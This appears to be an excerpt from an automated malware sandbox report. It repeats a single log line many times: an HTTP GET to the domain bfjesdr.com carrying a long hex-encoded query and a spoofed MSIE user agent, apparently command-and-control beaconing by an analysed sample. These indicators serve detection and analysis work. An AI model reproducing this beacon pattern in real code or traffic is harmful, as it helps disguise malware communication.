                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
